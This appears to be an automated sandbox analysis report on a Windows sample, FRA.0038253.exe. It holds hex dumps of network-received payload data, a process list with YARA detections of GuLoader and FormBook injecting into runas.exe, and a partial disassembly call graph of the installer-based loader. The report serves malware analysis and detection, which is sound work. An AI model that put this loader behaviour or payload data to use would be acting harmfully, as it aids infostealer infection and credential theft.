                                                                        2024-05-22 15:30:30 UTC244INData Raw: 40 85 46 06 ff eb 70 fb eb 91 72 92 92 e5 c0 c4 3b 36 ed e7 66 15 83 44 88 7e 34 73 5d d7 6e 42 d5 e9 9f 89 f1 16 87 92 19 dd ef 54 7a 40 74 00 f4 fe a0 30 49 2f 51 f2 a7 9d a3 31 32 1a 5f 61 24 ab 25 da 87 b1 3a 6d 4b 0f 78 dd 71 97 3c 45 23 b6 62 f4 bd 48 0e bf 6d de ea 55 a0 77 46 94 b5 d3 a4 66 97 f9 67 1a bd 9d b9 02 e2 4e 23 63 40 e7 2d a3 c6 ee 45 15 99 ae a9 7c 5d c2 3f 45 1d 7f fa 71 53 9a f4 f9 38 04 84 4f 9e ea 11 38 4e 80 e3 e1 35 6c 31 17 fb 21 32 a4 09 5c 39 b7 58 9b d9 de 6c 26 6c 0e bd 72 11 78 03 f3 f8 5f c7 7b 5f c7 ed d6 8a 66 e2 a8 0e 7c 40 0e ee 43 d5 99 3d fc 32 ed c1 48 ed e5 20 64 67 fc f1 04 4f 1a c1 4c ce ec 66 02 fd 99 d6 d8 8c 48 7f 44 b9 cc d4 35 23 8a d1 c9 b8 75 eb fa 6c a5 1a 31 a9 fa 4e 58
                                                                        Data Ascii: @Fpr;6fD~4s]nBTz@t0I/Q12_a$%:mKxq<E#bHmUwFfgN#c@-E|]?EqS8O8N5l1!2\9Xl&lrx_{_f|@C=2H dgOLfHD5#ul1NX
                                                                        2024-05-22 15:30:30 UTC1255INData Raw: 32 c7 93 c1 34 78 d3 c3 21 5c 3f 24 a4 c8 a6 46 ad e7 d9 28 b0 4e 43 3c 81 fa c1 e7 c7 e7 2c 8f 1b dd af cb fa f2 e9 42 51 bc e3 12 47 5f 9b 3b 80 30 c7 d3 9c cf 68 8f 8d b7 c7 0e 00 24 00 76 8f 17 98 45 dc 72 5e ed 95 ff 3d 08 f1 c1 25 7d 09 a8 03 59 e3 70 54 ba 07 7f 82 1d 30 1d 51 8e 95 85 df f9 80 84 83 81 97 73 0a 64 58 a1 ca 7c e6 ec 1b 07 13 bf 32 bc 8a b3 13 4d 03 cf d8 08 f3 34 f2 da ed 74 6e b6 76 c2 59 0a 15 b6 a6 46 08 01 6e 64 43 82 52 ae e8 3d b4 6a 21 44 6e 2c 1d de 55 cc 85 c6 6e bf 7c d1 d0 21 18 e6 f5 5e fb fc 28 67 03 92 b9 14 87 8b 16 f4 94 56 2d bc 0d bf 03 8b 48 65 91 0f 5f 14 97 0d 72 97 7f 17 ac 57 73 b0 a4 53 f6 cc 51 0a 25 ce e5 ef 98 b3 ed 7b 6b 35 9b 0e f5 6c fd 35 49 af 0d a7 1e 15 66 60 3d 07 22 65 ef d3 55 24 7c aa 5b 92 40
                                                                        Data Ascii: 24x!\?$F(NC<,BQG_;0h$vEr^=%}YpT0QsdX|2M4tnvYFndCR=j!Dn,Un|!^(gV-He_rWsSQ%{k5l5If`="eU$|[@
                                                                        2024-05-22 15:30:30 UTC67INData Raw: 35 47 e0 4e 01 93 7b aa 11 e0 24 e6 3e 3e fd 36 94 98 4a 8c d6 c7 50 1f 6a d6 90 c3 91 53 7e 2b a2 fb d4 f0 6c 39 ed 86 b0 f2 af 09 94 f6 9c 3d 3e 66 b3 86 16 91 9a 73 e7 8e 25 b3 49 e8 f1 9e 90 8e aa
                                                                        Data Ascii: 5GN{$>>6JPjS~+l9=>fs%I
                                                                        2024-05-22 15:30:30 UTC1255INData Raw: bb c3 79 81 75 84 3f 31 97 58 8a be e6 50 97 f4 54 2d e0 0d 0c ce 0b 02 d9 01 a7 e8 37 24 6b 4e cb 6f 26 7a 09 35 96 7e 51 05 b7 40 b0 a5 5e 83 37 3c 63 89 ba 75 57 86 25 c6 18 a7 84 44 fa e2 b4 bb a7 d1 b6 10 01 e5 f2 f9 ed 01 2c cb 16 d1 95 35 71 74 c7 74 14 d1 74 8d 51 b7 ee 4d 55 13 f6 4b 0f 87 9d 2e a8 12 17 fa 70 27 26 97 19 88 35 b6 b3 3c a6 10 c2 d4 53 0f 1f e4 92 31 22 cd a0 62 3f c3 96 76 8d fe bb 69 00 51 45 0e 68 82 de 06 ff b6 e0 9f 0f 33 a3 c4 41 d0 dd 31 65 42 c1 15 0b 8e 10 2e 79 2b 2b 70 a3 e7 77 5f b8 e0 d7 0d ac 27 8f d7 0d fd 19 ed 21 40 67 df ef ef 3d b3 64 f9 20 ec 0d 89 65 63 6c be 57 5a 86 5a 71 11 ff e9 7d 08 69 14 22 9b b7 1b 54 61 89 52 d8 05 20 de 44 20 a4 d6 84 6f d3 57 7e bb 33 59 70 08 28 fd 6d d4 fd 40 75 a6 60 eb 1a 8d 2a
                                                                        Data Ascii: yu?1XPT-7$kNo&z5~Q@^7<cuW%D,5qtttQMUK.p'&5<S1"b?viQEh3A1eB.y++pw_'!@g=d eclWZZq}i"TaR D oW~3Yp(m@u`*
                                                                        2024-05-22 15:30:30 UTC1255INData Raw: e2 be 70 46 a4 20 9f 34 fa dc fe cf 7e 65 1b b7 3e 3e 94 ad 1a c5 e8 b2 da c1 3b 6d c4 6b fb ad 8a a7 6c 45 f5 7b f7 f7 3e 3e 62 ee 7d 66 97 2d 99 a4 6f aa fa 1f 4c 48 90 ea 25 58 c4 5c c1 87 24 c5 0a 1a 4c 79 06 66 44 4e 9e ca 04 62 5c 6d 2e 25 11 a8 f7 aa 41 1f 3c 96 6e 80 7c 3d 19 f3 34 94 a4 f8 6d fe 0f 98 7d 0d 6c ef e8 03 e6 b3 6f 79 86 7e 74 ba bc ed 77 19 71 18 f0 7e be 0a d8 c0 58 30 ee fb 3e 3b b3 45 8a 10 11 e2 99 68 24 68 55 c1 9d ee 29 ee ae ec 85 da 0d 78 c0 db 78 11 55 4e f3 d8 05 52 10 e5 2e 73 3b 55 88 35 75 ca d4 15 56 f1 ad 75 8d d3 62 a1 16 9c fb 86 ae 88 5d a0 95 d5 ae 09 c8 bd df 4b 3d 5b 44 78 5d 28 9f b9 6e 05 81 b8 b4 11 56 4b 0b ad 76 55 d5 84 c4 d2 d2 a6 3c 8f 97 0a f7 01 98 5d 40 78 93 57 bb 93 c4 1f a8 a6 d5 9c 72 44 8d 9b 4e
                                                                        Data Ascii: pF 4~e>>;mklE{>>b}f-oLH%X\$LyfDNb\m.%A<n|=4m}loy~twq~X0>;Eh$hU)xxUNR.s;U5uVub]K=[Dx](nVKvU<]@xWrDN
                                                                        2024-05-22 15:30:30 UTC1255INData Raw: 35 04 b5 8b 00 f9 1c 10 21 82 92 e5 4f 4b 4c fc 7c 96 76 30 ce 27 f9 9f dc 9e 6f 6b b5 c7 09 ad 26 d9 13 a5 09 1c 51 19 99 e9 5e 71 7b 63 78 0e f8 6d c2 01 36 ea 8d 62 b2 f3 27 f3 74 69 3c d2 3a a6 60 ab 36 64 b1 59 cb 48 f8 c0 29 cf 7c 8c a2 23 52 78 01 d7 dc 44 9e 63 27 ab 3c 38 77 1c d8 f4 7a c8 00 ba e0 dd 1c d0 38 d8 13 db 21 27 eb 8e 82 55 43 7e a3 fd 1d ed 5e cf f0 12 ae 4f 83 a3 7a 7a 00 69 65 c5 55 4f 13 45 89 d2 1e 72 57 0b cf 1a bb be 9b d8 b8 eb 06 fd 8b 5d 46 09 c8 d2 33 c2 18 bc 9e 54 76 3e eb f5 8c 9d e8 0c 26 e4 4e c0 b5 d2 1e 5a 76 6e f0 d0 e9 1c 17 6a 3b 00 b7 cd d3 ed db 9f e5 ec 67 a8 6b 15 f2 87 04 cd 76 dc 9b c2 54 86 52 54 6f 8e ed 73 d8 58 7a 4f 01 dd 92 5c 27 61 d9 ac 80 ac a1 59 91 07 16 3c 7a 91 89 12 34 b0 2d 4c f0 3d f8 ee cc
                                                                        Data Ascii: 5!OKL|v0'ok&Q^q{cxm6b'ti<:`6dYH)|#RxDc'<8wz8!'UC~^OzzieUOErW]F3Tv>&NZvnj;gkvTRTosXzO\'aY<z4-L=
                                                                        2024-05-22 15:30:30 UTC1255INData Raw: 85 69 ab 44 94 cc f2 ba 13 4d 20 2e ae 18 17 27 dc 59 5f b7 16 53 94 19 e9 7a bc 97 f9 18 bb 88 ee 72 58 2a 82 19 7d e6 20 0e 9b de d7 0b 8e 7b 7c d4 df 9b ff 47 8a e5 56 7c 78 ac cb b9 5d d7 55 c8 40 9b 27 79 8c 55 ba 83 59 ed b4 6d 21 6d e3 c2 5f 6d b8 c4 82 48 74 6f 9f 6f 0b 2d bf e1 d1 36 27 7b de ef 42 d2 95 c0 10 1d cd e8 15 b8 6e b0 a1 3a 82 b2 7a e1 f1 b9 c6 99 dc b0 63 89 96 82 e0 f6 e1 88 52 59 a0 5a 4b 6b e4 42 85 e6 91 2e ff 2e 75 a3 05 47 b1 5b 6d c2 71 b5 8a 77 4b 71 3c a1 58 81 72 0a 00 4c 94 11 0e d8 a3 92 8f 8c 62 0c f1 a5 c7 48 c3 9d e0 15 b2 00 d4 8b ec 92 f8 8a 2a f4 f8 42 a3 f5 f9 b1 3c 5f d8 5b 63 0d e6 4f e2 4b 6d 58 20 69 45 44 dd e3 0e 8b 44 36 71 80 94 92 99 57 99 52 00 31 de 5d bf ef 69 b0 76 33 7b 81 80 28 44 1d 2d 5f 6f 8c 49
                                                                        Data Ascii: iDM .'Y_SzrX*} {|GV|x]U@'yUYm!m_mHtoo-6'{Bn:zcRYZKkB..uG[mqwKq<XrLbH*B<_[cOKmX iEDD6qWR1]iv3{(D-_oI
                                                                        2024-05-22 15:30:30 UTC1255INData Raw: 87 14 56 48 d4 b3 50 28 b2 54 74 ea 59 e0 f3 df 7a ca 5a 13 c0 40 aa 77 25 c8 e3 07 79 5c ff 3c c8 70 4d 3a 7d a3 82 f3 38 ad a2 f0 73 12 75 7b c0 de 8d d1 d3 15 dc e5 ad 71 e7 ee f8 7c e9 53 ac 32 ad 00 f3 f4 9a 53 bc f7 df 39 b3 79 59 6b e7 37 62 28 39 85 28 b8 71 c2 7b f0 14 85 54 51 f7 00 6d ed e4 ed f2 5a e2 e8 e9 6c 4a 86 f3 60 7a 47 6d 32 09 ac 79 4d e5 ff 80 a6 c3 81 25 6d fc 1f b7 20 f4 76 c6 e7 fa aa c1 4e 32 91 76 e9 42 be 59 41 5b ef c8 9d 38 9e 5f 87 00 bd 10 64 1e da 50 fe db 3d 3d c4 10 db b8 43 d2 f6 77 db 99 9d 6a 49 db 8e b7 b6 97 a5 8a 2f 11 6a 5e 78 5b 5d 2a 67 23 c4 30 be 87 d5 19 8f 43 0c 21 42 df 7d 86 af a9 7f 77 66 04 74 a7 05 6a 79 84 d2 01 fb 94 2e 6f 54 59 c9 07 6a ed c3 41 30 1f 0e 2c 25 77 27 58 95 0e 02 31 fe 8f 82 dc 24 a0
                                                                        Data Ascii: VHP(TtYzZ@w%y\<pM:}8su{q|S2S9yYk7b(9(q{TQmZlJ`zGm2yM%m vN2vBYA[8_dP==CwjI/j^x[]*g#0C!B}wftjy.oTYjA0,%w'X1$


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:11:29:29
                                                                        Start date:22/05/2024
                                                                        Path:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\FRA.0038253.exe"
                                                                        Imagebase:0x400000
                                                                        File size:587'552 bytes
                                                                        MD5 hash:B07B3994AD66A39937D9081EB64CD5F5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2678094371.0000000007F78000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:11:30:11
                                                                        Start date:22/05/2024
                                                                        Path:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\FRA.0038253.exe"
                                                                        Imagebase:0x400000
                                                                        File size:587'552 bytes
                                                                        MD5 hash:B07B3994AD66A39937D9081EB64CD5F5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:11:30:50
                                                                        Start date:22/05/2024
                                                                        Path:C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe"
                                                                        Imagebase:0x230000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:5
                                                                        Start time:11:30:52
                                                                        Start date:22/05/2024
                                                                        Path:C:\Windows\SysWOW64\runas.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\runas.exe"
                                                                        Imagebase:0x890000
                                                                        File size:17'920 bytes
                                                                        MD5 hash:3C9AD13D268D1DFB106DD8C2017478C2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:6
                                                                        Start time:11:31:05
                                                                        Start date:22/05/2024
                                                                        Path:C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe"
                                                                        Imagebase:0x230000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:7
                                                                        Start time:11:31:16
                                                                        Start date:22/05/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff639d90000
                                                                        File size:687'008 bytes
                                                                        MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:19.9%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:16.5%
                                                                          Total number of Nodes:1579
                                                                          Total number of Limit Nodes:35
                                                                          execution_graph 4321 4015c2 4322 402c5e 21 API calls 4321->4322 4323 4015c9 SetFileAttributesA 4322->4323 4324 4015db 4323->4324 5275 404742 5276 404752 5275->5276 5277 404778 5275->5277 5278 4042f7 22 API calls 5276->5278 5279 40435e 8 API calls 5277->5279 5280 40475f SetDlgItemTextA 5278->5280 5281 404784 5279->5281 5280->5277 4734 402543 4745 402c9e 4734->4745 4737 402c5e 21 API calls 4738 402556 4737->4738 4739 402560 RegQueryValueExA 4738->4739 4744 4027ed 4738->4744 4740 402580 4739->4740 4741 402586 RegCloseKey 4739->4741 4740->4741 4750 4061b5 wsprintfA 4740->4750 4741->4744 4746 402c5e 21 API calls 4745->4746 4747 402cb5 4746->4747 4748 4060dd RegOpenKeyExA 4747->4748 4749 40254d 4748->4749 4749->4737 4750->4741 5282 401a43 5283 402c5e 21 API calls 5282->5283 5284 401a4c ExpandEnvironmentStringsA 5283->5284 5285 401a60 5284->5285 5286 401a73 5284->5286 5285->5286 5287 401a65 lstrcmpA 5285->5287 5287->5286 5293 401744 5294 402c5e 21 API calls 5293->5294 5295 40174b SearchPathA 5294->5295 5296 401766 5295->5296 5297 401d44 5298 402c3c 21 API calls 5297->5298 5299 401d4b 5298->5299 5300 402c3c 21 API calls 5299->5300 5301 401d57 GetDlgItem 5300->5301 5302 40264d 5301->5302 5303 402ac5 SendMessageA 5304 402adf InvalidateRect 5303->5304 5305 402aea 5303->5305 5304->5305 5306 70752c73 5307 70752c8b 5306->5307 5308 707515c4 2 API calls 5307->5308 5309 70752ca6 5308->5309 4782 4023c9 4783 4023d1 4782->4783 4784 4023d7 4782->4784 4785 402c5e 21 API calls 4783->4785 4786 4023e7 4784->4786 4787 402c5e 21 API calls 4784->4787 4785->4784 4788 402c5e 21 API calls 4786->4788 4791 4023f5 4786->4791 4787->4786 4788->4791 4789 402c5e 21 API calls 4790 4023fe WritePrivateProfileStringA 4789->4790 4791->4789 4792 4014ca 4793 40539b 28 API calls 4792->4793 4794 4014d1 4793->4794 4795 4020ca 4796 40218a 4795->4796 4797 4020dc 4795->4797 4800 401423 28 API calls 4796->4800 4798 402c5e 21 API calls 4797->4798 4799 4020e3 4798->4799 4801 402c5e 21 API calls 4799->4801 4806 40230f 4800->4806 4802 4020ec 4801->4802 4803 402101 LoadLibraryExA 4802->4803 4804 4020f4 GetModuleHandleA 4802->4804 4803->4796 4805 402111 GetProcAddress 4803->4805 4804->4803 4804->4805 4807 402120 4805->4807 4808 40215d 4805->4808 4810 402128 4807->4810 4811 40213f 4807->4811 4809 40539b 28 API calls 4808->4809 4813 402130 4809->4813 4812 401423 28 API calls 4810->4812 4816 7075176b 4811->4816 4812->4813 4813->4806 4814 40217e FreeLibrary 4813->4814 4814->4806 4817 7075179b 4816->4817 4858 70751b28 4817->4858 4819 707517a2 4820 707518c4 4819->4820 4821 707517b3 4819->4821 4822 707517ba 4819->4822 4820->4813 4906 7075233f 4821->4906 4890 70752381 4822->4890 4827 70751800 4919 70752568 4827->4919 4828 7075181e 4831 70751824 4828->4831 4832 7075186c 4828->4832 4829 707517d0 4834 707517d6 4829->4834 4835 707517e1 4829->4835 4830 707517e9 4842 707517df 4830->4842 4916 70752d53 4830->4916 4938 707515fb 4831->4938 4839 70752568 11 API calls 4832->4839 4834->4842 4900 70752ac8 4834->4900 4910 70752742 4835->4910 4845 7075185d 4839->4845 4840 70751806 4930 707515e9 4840->4930 4842->4827 4842->4828 4850 707518b3 4845->4850 4944 7075252e 4845->4944 4847 707517e7 4847->4842 4848 70752568 11 API calls 4848->4845 4850->4820 4852 707518bd GlobalFree 4850->4852 4852->4820 4855 7075189f 4855->4850 4948 70751572 wsprintfA 4855->4948 4856 70751898 FreeLibrary 4856->4855 4951 707512a5 GlobalAlloc 4858->4951 4860 70751b4f 4952 707512a5 GlobalAlloc 4860->4952 4862 70751d90 GlobalFree GlobalFree GlobalFree 4863 70751dad 4862->4863 4876 70751df7 4862->4876 4864 70752181 4863->4864 4871 70751dc2 4863->4871 4863->4876 4866 707521a3 GetModuleHandleA 4864->4866 4864->4876 4865 70751c4d GlobalAlloc 4882 70751b5a 4865->4882 4868 707521b4 LoadLibraryA 4866->4868 4869 707521c9 4866->4869 4867 70751cb6 GlobalFree 4867->4882 4868->4869 4868->4876 4959 70751652 GetProcAddress 4869->4959 4870 70751c98 lstrcpyA 4873 70751ca2 lstrcpyA 4870->4873 4871->4876 4955 707512b4 4871->4955 4873->4882 4874 7075221a 4874->4876 4879 70752227 lstrlenA 4874->4879 4875 70752047 4958 707512a5 GlobalAlloc 4875->4958 4876->4819 4960 70751652 GetProcAddress 4879->4960 4880 707521db 4880->4874 4888 70752204 GetProcAddress 4880->4888 4882->4862 4882->4865 4882->4867 4882->4870 4882->4873 4882->4875 4882->4876 4883 70751f89 GlobalFree 4882->4883 4884 707520c3 4882->4884 4885 707512b4 2 API calls 4882->4885 4953 707515c4 GlobalSize GlobalAlloc 4882->4953 4883->4882 4884->4876 4887 7075211c lstrcpyA 4884->4887 4885->4882 4887->4876 4888->4874 4889 7075204f 4889->4819 4891 7075239a 4890->4891 4893 707524d6 GlobalFree 4891->4893 4894 70752448 GlobalAlloc MultiByteToWideChar 4891->4894 4896 70752495 4891->4896 4897 707512b4 GlobalAlloc lstrcpynA 4891->4897 4962 7075133d 4891->4962 4893->4891 4895 707517c0 4893->4895 4894->4896 4898 70752474 GlobalAlloc CLSIDFromString GlobalFree 4894->4898 4895->4829 4895->4830 4895->4842 4896->4893 4966 707526d6 4896->4966 4897->4891 4898->4893 4902 70752ada 4900->4902 4901 70752b7f CreateFileA 4903 70752b9d 4901->4903 4902->4901 4969 70752a74 4903->4969 4905 70752c69 4905->4842 4907 70752354 4906->4907 4908 7075235f GlobalAlloc 4907->4908 4909 707517b9 4907->4909 4908->4907 4909->4822 4914 70752772 4910->4914 4911 70752820 4913 70752826 GlobalSize 4911->4913 4915 70752830 4911->4915 4912 7075280d GlobalAlloc 4912->4915 4913->4915 4914->4911 4914->4912 4915->4847 4918 70752d5e 4916->4918 4917 70752d9e GlobalFree 4918->4917 4973 707512a5 GlobalAlloc 4919->4973 4921 70752604 StringFromGUID2 WideCharToMultiByte 4927 70752574 4921->4927 4922 707525f3 lstrcpynA 4922->4927 4923 70752628 WideCharToMultiByte 4923->4927 4924 7075266d GlobalFree 4924->4927 4925 70752649 wsprintfA 4925->4927 4926 707526a7 GlobalFree 4926->4840 4927->4921 4927->4922 4927->4923 4927->4924 4927->4925 4927->4926 4928 707512f6 2 API calls 4927->4928 4974 70751361 4927->4974 4928->4927 4978 707512a5 GlobalAlloc 4930->4978 4932 707515ee 4933 707515fb 2 API calls 4932->4933 4934 707515f8 4933->4934 4935 707512f6 4934->4935 4936 707512ff GlobalAlloc lstrcpynA 4935->4936 4937 70751338 GlobalFree 4935->4937 4936->4937 4937->4845 4939 70751634 lstrcpyA 4938->4939 4940 70751607 wsprintfA 4938->4940 4943 7075164d 4939->4943 4940->4943 4943->4848 4945 7075187f 4944->4945 4946 7075253c 4944->4946 4945->4855 4945->4856 4946->4945 4947 70752555 GlobalFree 4946->4947 4947->4946 4949 707512f6 2 API calls 4948->4949 4950 70751593 4949->4950 4950->4850 4951->4860 4952->4882 4954 707515e2 4953->4954 4954->4882 4961 707512a5 GlobalAlloc 4955->4961 4957 707512c3 lstrcpynA 4957->4876 4958->4889 4959->4880 4960->4876 4961->4957 4963 70751344 4962->4963 4964 707512b4 2 API calls 4963->4964 4965 7075135f 4964->4965 4965->4891 4967 707526e4 VirtualAlloc 4966->4967 4968 7075273a 4966->4968 4967->4968 4968->4896 4970 70752a7f 4969->4970 4971 70752a84 GetLastError 4970->4971 4972 70752a8f 4970->4972 4971->4972 4972->4905 4973->4927 4975 70751389 4974->4975 4976 7075136a 4974->4976 4975->4927 4976->4975 4977 70751370 lstrcpyA 4976->4977 4977->4975 4978->4932 5310 402e4a 5311 402e72 5310->5311 5312 402e59 SetTimer 5310->5312 5313 402ec7 5311->5313 5314 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5311->5314 5312->5311 5314->5313 5015 40244e 5016 402480 5015->5016 5017 402455 5015->5017 5018 402c5e 21 API calls 5016->5018 5019 402c9e 21 API calls 5017->5019 5020 402487 5018->5020 5021 40245c 5019->5021 5027 402d1c 5020->5027 5022 402466 5021->5022 5025 402494 5021->5025 5024 402c5e 21 API calls 5022->5024 5026 40246d RegDeleteValueA RegCloseKey 5024->5026 5026->5025 5028 402d28 5027->5028 5029 402d2f 5027->5029 5028->5025 5029->5028 5031 402d60 5029->5031 5032 4060dd RegOpenKeyExA 5031->5032 5033 402d8e 5032->5033 5034 402e43 5033->5034 5035 402d98 5033->5035 5034->5028 5036 402d9e RegEnumValueA 5035->5036 5040 402dc1 5035->5040 5037 402e28 RegCloseKey 5036->5037 5036->5040 5037->5034 5038 402dfd RegEnumKeyA 5039 402e06 RegCloseKey 5038->5039 5038->5040 5041 40667f 5 API calls 5039->5041 5040->5037 5040->5038 5040->5039 5042 402d60 6 API calls 5040->5042 5043 402e16 5041->5043 5042->5040 5044 402e38 5043->5044 5045 402e1a RegDeleteKeyA 5043->5045 5044->5034 5045->5034 5315 4027cf 5316 402c5e 21 API calls 5315->5316 5317 4027d6 FindFirstFileA 5316->5317 5318 4027f9 5317->5318 5322 4027e9 5317->5322 5323 4061b5 wsprintfA 5318->5323 5320 402800 5324 406257 lstrcpynA 5320->5324 5323->5320 5324->5322 5325 401c53 5326 402c3c 21 API calls 5325->5326 5327 401c5a 5326->5327 5328 402c3c 21 API calls 5327->5328 5329 401c67 5328->5329 5330 401c7c 5329->5330 5331 402c5e 21 API calls 5329->5331 5332 401c8c 5330->5332 5333 402c5e 21 API calls 5330->5333 5331->5330 5334 401ce3 5332->5334 5335 401c97 5332->5335 5333->5332 5336 402c5e 21 API calls 5334->5336 5337 402c3c 21 API calls 5335->5337 5338 401ce8 5336->5338 5339 401c9c 5337->5339 5340 402c5e 21 API calls 5338->5340 5341 402c3c 21 API calls 5339->5341 5342 401cf1 FindWindowExA 5340->5342 5343 401ca8 5341->5343 5346 401d0f 5342->5346 5344 401cd3 SendMessageA 5343->5344 5345 401cb5 SendMessageTimeoutA 5343->5345 5344->5346 5345->5346 5347 402653 5348 402658 5347->5348 5349 40266c 5347->5349 5350 402c3c 21 API calls 5348->5350 5351 402c5e 21 API calls 5349->5351 5353 402661 5350->5353 5352 402673 lstrlenA 5351->5352 5352->5353 5354 405e91 WriteFile 5353->5354 5355 402695 5353->5355 5354->5355 5356 70751661 5362 7075154b 5356->5362 5358 707516bf GlobalFree 5359 70751679 5359->5358 5360 70751694 5359->5360 5361 707516ab VirtualFree 5359->5361 5360->5358 5361->5358 5364 70751551 5362->5364 5363 70751557 5363->5359 5364->5363 5365 70751563 GlobalFree 5364->5365 5365->5359 5366 707510e0 5375 70751110 5366->5375 5367 7075129a GlobalFree 5368 707511cd GlobalAlloc 5368->5375 5369 7075133d 2 API calls 5369->5375 5370 70751295 5370->5367 5371 70751286 GlobalFree 5371->5375 5372 707512f6 2 API calls 5372->5375 5373 70751165 GlobalAlloc 5373->5375 5374 70751361 lstrcpyA 5374->5375 5375->5367 5375->5368 5375->5369 5375->5370 5375->5371 5375->5372 5375->5373 5375->5374 5062 4014d6 5063 402c3c 21 API calls 5062->5063 5064 4014dc Sleep 5063->5064 5066 402aea 5064->5066 5383 402758 5384 40275f 5383->5384 5390 402a6c 5383->5390 5385 402c3c 21 API calls 5384->5385 5386 402766 